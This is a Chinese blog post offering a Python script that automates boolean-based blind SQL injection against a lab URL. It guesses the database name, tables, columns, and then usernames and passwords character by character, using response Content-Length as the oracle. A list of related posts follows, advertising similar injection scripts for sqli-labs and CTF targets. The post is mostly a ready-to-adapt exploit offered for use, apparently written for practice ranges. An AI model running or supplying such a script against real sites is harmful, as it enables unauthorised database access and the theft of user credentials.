python布尔盲注的脚本

最新推荐文章于 2025-03-12 21:36:14 发布
原创 最新推荐文章于 2025-03-12 21:36:14 发布 · 592 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #mysql #python

该Python脚本用于执行布尔盲注攻击,通过调整Content-Length值探测数据库信息,包括库名、表名、字段名以及数据长度,最终获取可能的用户名和密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值

class bool():
    def __init__(self):
        self.url='http://192.168.18.141/sefa15/book/xian.php?id=7'
        self.data=string.ascii_lowercase + string.digits + '_-?,.'  #公共使用的资源
    def request(self,sql):
        num = requests.get(sql)
        nu = num.headers['Content-Length']  #全都需要使用的步骤,获取响应头部信息
        return nu
    def bool_sql(self):
        for i in range(1,10):   #这里只设置了1-9有需要可以修改
            pay=f' and length(database())={i}'
            sql=self.url+pay
            nu=self.request(sql)  #获取判断响应头部
            if nu !='2199':   #这个值,页面都是不同的
                return i
    def bool_sql_def(self):
        n=self.bool_sql()
        s=''
        for i in range(1,n+1):
            for da in self.data:
                pay=f" and substr(database(),{i},1)='{da}'"
                sql=self.url+pay
                nu = self.request(sql)
                if nu =='2116':
                    s+=da
        print(f'库名{s}')  #库名出来了
        return s
    def bool_sql_colu(self):
        for i in range(1,100):
            pay=f' and (length((select group_concat(table_name) from information_schema.tables where table_schema=database() )))={i}'
            sql=self.url+pay
            nu = self.request(sql)
            if nu=='2280':   #表的长度
                print(f'表长度{i}')
                return i
    def bool_sql_colu_def(self):
        n=self.bool_sql_colu()
        s=''
        # print(n)
        for i in range(1, n + 1):
            for da in self.data:
                pay=f" and (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) ,{i},1))='{da}'"
                sql = self.url + pay
                nu = self.request(sql)
                if nu == '2290' or nu=='2292':   #发现库有两个值,发现不全
                    s=s+da
        print(f'表名{s}')
        return s
    def bool_sql_fie(self):
        s=self.bool_sql_colu_def()
        s=(s.split(','))  #转换列
        self.v=[]
        for i in s:
            if i == 'users' or i == 'use':  #进行判断,找出所有可能的表
                self.v.append(i)
        for z in self.v:
            for n in range(1,100):
                pay=f" and (length((select group_concat(column_name) from information_schema.columns where table_name='{z}' )))={n}"
                sql = self.url + pay
                nu = self.request(sql)
                if nu == '2274':
                    print(f'字段长度{n}')
                    return n
    def bool_sql_fie_def(self):
        n=self.bool_sql_fie()
        s=''
        for z in self.v:   #因为可能不止一个含有user库,无法判断因此进行多次循环,遍历所有可能性
            for i in range(1, n + 1):
                for da in self.data:
                    pay=f" and (substr((select group_concat(column_name) from information_schema.columns where table_name='{z}') ,{i},1))='{da}'"
                    sql = self.url + pay
                    nu = self.request(sql)
                    if nu == '2284' or nu == '2286':
                        s = s + da
        print(f'字段名{s}')
        return s
    def bool_data(self):
        k = self.bool_sql_def()
        s=self.bool_sql_fie_def()
        s = (s.split(','))
        self.paw=''
        self.use=''
        p=''
        u=''
        for z in s:
            if z == 'username':
                self.use=z
            elif z == 'password':
                self.paw=z
        for x in self.v:
            for i in range(1,50):
                pay=f" and (length((select group_concat({self.use}) from {k}.{x} )))={i}"
                sql = self.url + pay
                nu = self.request(sql)
                if nu == '2186':
                    u=i
        for x in self.v:
            for i in range(1, 50):
                pay = f" and (length((select group_concat({self.paw}) from {k}.{x} )))={i}"
                sql = self.url + pay
                nu = self.request(sql)
                if nu == '2186':
                    p=i
        print(f'用户名数据长度{u}')
        print(f'密码数据长度{p}')
        return u,p
    def bool_user_password(self):
        ure=''
        pas=''
        usernum,pawnum=self.bool_data()
        k = self.bool_sql_def()
        for x in self.v:  #同样对所有可能进行遍历
            for u in range(1,usernum+1):
                for da in self.data:
                    pay=f" and (substr((select group_concat({self.use}) from {k}.{x} ),{u},1))='{da}'"
                    sql = self.url + pay
                    nu = self.request(sql)
                    if nu == '2196' or nu == '2198':
                        ure+=da
        for x in self.v:
            for u in range(1, usernum + 1):
                for da in self.data:
                    pay = f" and (substr((select group_concat({self.paw}) from {k}.{x} ),{u},1))='{da}'"
                    sql = self.url + pay
                    nu = self.request(sql)
                    if nu == '2196' or nu == '2198':
                        pas += da
        ure = (ure.split(','))
        pas = (pas.split(','))
        mes=dict(zip(ure,pas))
        print(f'用户名和密码是{mes}')  #进行字典处理方便后续查看
if __name__ == '__main__':
    # time_sql()
    bool=bool()
    bool.bool_user_password()

gg_Go_game
关注
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
2301_82244514的博客
04-30 834
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
布尔盲注.py_sqlpython_
10-03
一个简单的sql注入注的python脚本,其中语句需要根据环境条件做改变
python脚本实现布尔盲注
04-28 1184
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 5705
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
Python自动化sql注入:布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 1335
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1347
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
Python布尔盲注脚本:高效GET和POST攻击检测
GET型布尔盲注脚本,即bool_sql_get.py,主要是通过在GET请求中插入恶意构造的SQL查询语句来实现。这个脚本在执行时会向目标URL发送带有特定参数的GET请求。如果Web应用程序存在SQL注入漏洞,通过分析Web应用程序的...
python脚本布尔盲注
ro4lsc的博客
04-21 7219
这个好像也没什么可以多说了,那么直接上脚本吧 import optparse import requests #---------------------------- usage = "python3 %prog -u <URL> -P <patten> -F <find text>" parser = optparse.OptionParser(usage...
基于python布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 2142
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
布尔盲注(ctfhub)
2401_82985722的博客
03-27 2336
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
写一个布尔盲注脚本
weixin_35752645的博客
01-01 592
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 1296
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
爱上python注探测脚本
dfdhxb995397的博客
09-13 196
  本文转自:i春秋论坛 前言:   最近在学python,做了个注的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自写脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔盲注的靶机   另外感谢大表姐的指导。   稍作解释:注入语句里用%s占位,等待在for循里面依次判断长度 [App...
Bool注脚
Forever_Han13的博客
01-21 727
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
python脚本实现半自动化布尔盲注
weixin_44255856的博客
04-27 940
原文链接:http://zzqsmile.top/2018/06/04/python3/2018-06-04-布尔盲注/ from optparse import OptionParser import sys import requests import hashlib parser=OptionParser() parser.add_option("-D", "--database", a...
Python-Boolean注脚本(附带注释,总脚本在结尾)
sGanYu
02-27 1360
靶场:CTFHub 设置重新连接,默认的情况下keep-alive为True # -*- coding: UTF-8 -*- import requests import optparse # 实现为脚本传递命令参数 import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} flag = "query_success" # 判断注Ture回显的特定内容 r1 = int(input('设置重连次数
布尔盲注爆破脚本
最新发布
2401_88743143的博客
03-12 123
【代码】布尔盲注爆破脚本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值